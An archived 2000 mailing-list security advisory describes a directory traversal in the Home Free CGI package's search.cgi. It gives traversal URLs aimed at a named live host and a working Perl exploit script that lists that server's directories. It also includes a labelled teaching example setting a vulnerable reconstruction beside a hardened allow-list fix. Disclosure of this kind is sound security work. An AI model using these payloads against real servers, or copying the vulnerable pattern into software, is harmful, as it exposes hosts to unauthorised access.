Another search.cgi vulnerability

From: k0ad k1d (k0adk1dat_private)
Date: Mon Jan 03 2000 - 18:52:23 PST

    ==============================================================================
    
        #!/bin/csh security advisory
        ----------------------------
    
               Title  :  Vulnerabilities in the SolutionScripts.com
                         Home Free CGI package.
    
        Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01
    
             Credits  :  fzx, omnihil, the guys in !el8
                         DSKZ, M0D
    
    ==============================================================================
    
    Introduction
    ------------
    
    SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
    support the language (WinNT, Linux, various Unix flavors). Home Free is a
    package developed and marketed by SolutionScripts.com; the following is an
    extract from their website.
    
    
         "Home Free is the ultimate community building program. Allowing you
          to give your visitors a free web site on your server. With complete
          control over every aspect of your free web site program, you can
          grow page views, revenue and brand awareness for your site."
    
          http://solutionscripts.com/vault/homefree/index.shtml
    
    
    Home Free is used by a number of popular websites. It is intended to let
    users set up and maintain their own websites through a series of CGI
    scripts without giving them any further access to the host. The problem
    described below shows that the scripts themselves expose the host.
    
    
    Details
    -------
    
    Home Free consists of the following files from an end-user point of view :-
    
         ./features.cgi
         ./new.cgi
         ./search.cgi
         ./signup.cgi
         ./user_files.cgi
         ./user_formmail.cgi
         ./user_ftp_import.cgi
         ./user_gbook.cgi
         ./user_manage.cgi
         ./user_pref.cgi
         ./user_uploads.cgi
         ./user_wwwboard.cgi
    
    
    There are also various 'admin' CGI scripts in the package, such as :-
    
         ./admin.cgi
         ./admin_browse.cgi
         ./admin_cata.cgi
         ./admin_email.cgi
         ./admin_features.cgi
         ./admin_setup.cgi
         ./admin_update.cgi
    
    
    
    Vulnerabilities Identified
    --------------------------
    
         ./search.cgi
    
         The search.cgi script uses the following input variables :-
    
           letter=any string
           cata=any string
           perpage=any string
           start=any string
           boolean=or/and
           advanced
    
    
         This CGI script can be exploited to view directory listings on the host
         server. The problem is a directory traversal: the value of the 'letter'
         variable is not validated before search.cgi uses it as part of a
         directory path, so a value containing '..' path components walks out
         of the directory the script is meant to list, for example :-
    
    
    http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt
    
         The above URL will list the \winnt directory of the host. The search.cgi
         script also seems to read and display the first line of each file
         (network.wri, et al). We have been unable to use the search.cgi script
         or any of the other scripts in the package to view files to date.
    
         If we had access to the source code of these Perl scripts, I'm sure that
         many security problems would be identified.
    
         You can also exploit the vulnerability to view other directory listings,
         such as the /cgi-bin directory under Apache.
    
    
    http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin
    
         Note that the backslash separators work here because the host in the
         examples is running Windows (hence the \winnt and \apache\cgi-bin
         paths). On a Unix host the same traversal would be written with '../';
         a backslash is an ordinary filename character there, so the Windows
         form of the URL would not leave the intended directory.
    
    
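         The pattern behind this kind of traversal, shown as an added example
         that is not code from the advisory or from SolutionScripts (whose
         source the authors did not have). list_users_vulnerable() is a
         reconstruction of the likely bug, a 'letter' value concatenated
         straight into a path and handed to opendir(); list_users_safe() is the
         hardened form, which accepts only the single alphanumeric character
         the parameter is meant to carry. Both function names, the users/secret
         directory layout and the file names are assumptions made for the
         example; the fixture is built in a temporary directory so it runs
         offline.

```perl
#!/usr/bin/perl
# Added example, not SolutionScripts' code: the unvalidated-path pattern
# behind the search.cgi traversal, beside a hardened version. The Home Free
# source was not available to the advisory authors, so list_users_vulnerable()
# is a reconstruction of the likely bug, not the vendor's actual code.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Reconstructed (hypothetical) vulnerable pattern: the 'letter' CGI value is
# concatenated straight into a path and passed to opendir. "..\..\winnt"
# walks out of the users directory on a Windows host; "../../etc" does the
# same on Unix.
sub list_users_vulnerable {
    my ($users_root, $letter) = @_;
    my $dir = "$users_root/$letter";
    opendir(my $dh, $dir) or return;
    my @entries = grep { !/^\.\.?$/ } readdir($dh);
    closedir($dh);
    return sort @entries;
}

# Hardened version: accept only the single alphanumeric character the
# parameter is meant to carry and refuse anything else. The untainted copy
# in $1 is what gets used, never the raw CGI value.
sub list_users_safe {
    my ($users_root, $letter) = @_;
    return unless defined $letter && $letter =~ /^([A-Za-z0-9])$/;
    my $dir = "$users_root/$1";
    opendir(my $dh, $dir) or return;
    my @entries = grep { !/^\.\.?$/ } readdir($dh);
    closedir($dh);
    return sort @entries;
}

# Constructed fixture: a fake Home Free tree with a "users/a" directory and a
# sibling "secret" directory that should never be listable via the script.
my $root = tempdir(CLEANUP => 1);
mkdir "$root/users"   or die "mkdir: $!";
mkdir "$root/users/a" or die "mkdir: $!";
mkdir "$root/secret"  or die "mkdir: $!";
open(my $fh, '>', "$root/users/a/alice")   or die "open: $!"; close $fh;
open($fh,    '>', "$root/secret/config.pl") or die "open: $!"; close $fh;

my $users = "$root/users";

# Normal use: both versions list the 'a' users directory.
print "vulnerable, letter=a        : @{[ list_users_vulnerable($users, 'a') ]}\n";
print "safe,       letter=a        : @{[ list_users_safe($users, 'a') ]}\n";

# Traversal: the vulnerable version lists the sibling directory, the
# hardened version rejects the value outright.
print "vulnerable, letter=../secret: @{[ list_users_vulnerable($users, '../secret') ]}\n";
my @leak = list_users_safe($users, '../secret');
print "safe,       letter=../secret: ", (@leak ? "@leak" : "(rejected)"), "\n";
```

         The allow-list check is the important part: stripping '..' or
         backslashes from the value is the wrong fix, since the parameter only
         ever needs to be one character and anything else should be refused.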
         We also took the time to write a short Perl script to display the
         directory listings of vulnerable servers :
    
         --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
    
         #!/usr/bin/perl
         #
         # Quick exploit of the Home Free ./search.cgi script, allows you to list
         # directories on the host.
         #
         # Default server is antionline's, change as appropriate.
         #
         # Argument: the directory to list, relative to the drive root on the
         # Windows host (e.g. winnt).
         #
    
         use IO::Socket;
    
         if ($ARGV[0] eq "") { die "no argument\n"; }
    
         $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                       PeerAddr  => "members.antionline.com",
                                       PeerPort  => 80) ||
                         die "can't connect to host: $!";
    
         select($asoc);
         $| = 1;
    
         # Backslash traversal in 'letter'; perpage=all so the listing is not
         # paged. A bare HTTP/1.0 request needs no Host header.
         print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
    
         # Each directory entry comes back as a table cell holding a link;
         # pull the last path component out of the HREF and print it.
         while(<$asoc>) {
                 if ($_ =~ /.+HREF.+TD.+/) {
                         @parts = split("\"", $_);
                         $foo = $parts[1];
                         @parts = split("/", $foo);
                         print STDOUT $parts[3];
                         print STDOUT "\n";
                 }
         }
         close($asoc);
    
         --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
    
    
    
      Other smaller problems were identified when testing the bounds checking and
      flexibility of the other scripts, such as user_manage.cgi. Without access to
      the source code of the Perl scripts in question, it is very difficult to
      know the security implications of such problems. We'll leave that up to
      the vendor to look into and patch.
    
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:25:47 PDT